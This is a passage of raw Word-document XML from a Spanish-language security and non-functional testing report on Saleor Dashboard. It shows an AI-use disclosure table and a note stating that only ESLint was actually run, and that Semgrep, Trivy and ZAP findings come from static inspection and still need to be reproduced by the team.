              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Herramienta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">¿Salida verificada? ¿Cómo?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Claude (Anthropic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Explorar el repositorio, identificar los cambios del equipo (3 commits), interpretar la salida real de ESLint, construir el modelo STRIDE y el análisis estático de Semgrep/Trivy/ZAP, redactar los PoCs y generar este informe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sí.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Cada hallazgo se verificó leyendo el código fuente real y citando archivo + línea exactos (p. ej.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:75</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">storage.ts:37</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nginx/default.conf</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">). Las referencias</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git show</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">de los commits y los números de línea fueron comprobados directamente sobre el repositorio. ESLint se ejecutó de verdad y su salida se incluye sin modificar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Limitación divulgada.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ESLint se ejecutó realmente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(contenedor del dashboard; salida cruda en la sección 1.1) y sus hallazgos fueron interpretados por la IA. Para Semgrep, Trivy y OWASP ZAP, el entorno de la IA no disponía de los binarios/servicios; sus resultados se sustentan en inspección estática con archivo + línea y deben</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">reproducirse y adjuntarse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ejecutando los comandos indicados. OWASP ZAP lo ejecuta el equipo. Todos los hallazgos generados por IA fueron contrastados contra el código fuente antes de incluirse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendación de verificación para el equipo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Antes de la entrega final, ejecutar los comandos de reproducción de las secciones 2.2, 2.3 y 2.4 y pegar la salida cruda en los bloques marcados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">[Pegar…]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, confirmando que coincide con los hallazgos documentados. (La sección 1.1 ya contiene la salida real de ESLint.)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No Funcional — Saleor Dashboard</dc:title>
  <dc:creator/>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-06T14:18:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-06T14:18:33Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>